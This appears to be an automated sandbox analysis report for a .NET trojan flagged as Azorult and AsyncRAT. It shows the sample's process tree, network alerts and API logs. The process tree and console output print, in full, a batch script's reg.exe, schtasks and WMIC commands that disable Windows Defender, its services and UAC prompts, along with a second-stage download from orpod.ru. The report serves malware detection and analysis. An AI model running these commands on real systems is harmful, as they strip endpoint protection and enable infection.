Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 28, 2021, 12:10 p.m.	March 28, 2021, 12:25 p.m.

Size	864.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`66c3ae9bddbbbcc2cc979d23792f15ac`
SHA256	`b0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274`
CRC32	`BAEA18C4`
ssdeep	`12288:+3GHgV2VMQhAQE1/WGPNCfhPS/1GpmVaNYTbotfR58DE+2u:+3G7jEhPNC5PO1GyUt78DE+2u`
Yara	PE_Header_Zero - PE File Signature Zero IsPE32 - (no description) IsNET_EXE - (no description) IsWindowsGUI - (no description) Win32_Trojan_PWS_Azorult_Net_1_Zero - Win32 Trojan PWS .NET Azorult Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

win230321.exe "C:\Users\test22\AppData\Local\Temp\win230321.exe"
6240
- InstallUtil.exe "C:\Users\test22\AppData\Local\Temp\InstallUtil.exe"
  5540
  - deffff.exe "C:\Users\test22\AppData\Local\Temp\deffff.exe"
    8104
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp\Disable Window Defender.bat" "
      4496
      - reg.exe reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        9168
      - reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
        3916
      - reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        2060
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        1036
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        3176
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        3456
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5352
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        4900
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        3064
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        7804
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        7608
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        4804
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        2460
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        1596
      - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        2408
      - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        3780
      - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        7280
      - schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9148
      - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        8116
      - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        296
      - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        5676
      - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        6104
      - reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        3984
      - reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5996
      - reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        6300
      - reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        6752
      - reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        7120
      - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        8672
      - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        4072
      - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        3328
      - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        6664
      - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        7188
  - puttty.exe "C:\Users\test22\AppData\Local\Temp\puttty.exe"
    8572

Name	Response	Post-Analysis Lookup
orpod.ru	A 195.128.123.215	195.128.123.215
www.google.com	A 216.58.221.228	172.217.25.100

IP Address	Status	Action
13.107.21.200	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
195.128.123.215	Active	Moloch
216.58.221.228	Active	Moloch
216.58.199.100	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49805 -> 216.58.221.228:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49807 -> 13.107.21.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49812 -> 195.128.123.215:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 195.128.123.215:80 -> 192.168.56.102:49812	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 195.128.123.215:80 -> 192.168.56.102:49812	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.102:49812 -> 195.128.123.215:80	2026570	ET HUNTING Possibly Suspicious Request for Putty.exe from Non-Standard Download Location	Potentially Bad Traffic
TCP 195.128.123.215:80 -> 192.168.56.102:49812	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49805 216.58.221.228:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com	06:cb:c1:ed:3f:d8:18:b6:14:ee:10:02:2a:d8:2b:f3:bf:63:0f:20
TLSv1 192.168.56.102:49807 13.107.21.200:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=www.bing.com	dc:c1:ac:40:22:1b:57:e3:9b:c9:2e:d2:eb:9b:a4:53:07:7f:62:f4

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 28, 2021, 12:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:10 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:10 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 28, 2021, 12:10 p.m.			0	0
IsDebuggerPresent March 28, 2021, 12:10 p.m.			0	0
IsDebuggerPresent March 28, 2021, 12:10 p.m.			0	0
IsDebuggerPresent March 28, 2021, 12:10 p.m.			0	0
IsDebuggerPresent March 28, 2021, 12:10 p.m.			0	0

Command line console output was observed (50 out of 173 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: Exclusion in WD can be easily set with an elevated cmd, so that makes it super easy to damage any pc. console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="xxxxxx console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: To disable System Guard Runtime Monitor Broker console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: To disable Windows Defender Security Center include this console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: 1 - Disable Real-time protection console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS2D7C.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:10 p.m.	buffer: reg console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey March 28, 2021, 12:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00480cc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2021, 12:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00480cc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2021, 12:10 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00480c88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 28, 2021, 12:10 p.m.		1	1	0

One or more processes crashed (50 out of 65536 events)

Time & API	Arguments	Status
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 1825495682 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
__exception__ March 28, 2021, 12:10 p.m.	stacktrace: LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825 puttty+0x14e52 @ 0x414e52 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1636708 registers.edi: 9043968 registers.eax: 4294967288 registers.ebp: 1636760 registers.edx: 6 registers.ebx: 0 registers.esi: 0 registers.ecx: 5260	1
